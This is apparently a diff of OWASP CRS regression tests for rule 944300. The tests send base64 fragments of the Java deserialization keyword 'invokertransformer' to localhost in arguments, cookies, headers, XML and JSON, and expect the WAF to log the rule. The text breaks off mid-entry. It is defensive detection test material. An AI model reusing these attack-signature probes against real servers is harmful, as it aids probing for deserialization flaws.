[944300] + - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 210 desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 221 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 223 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 226 desc: "XML 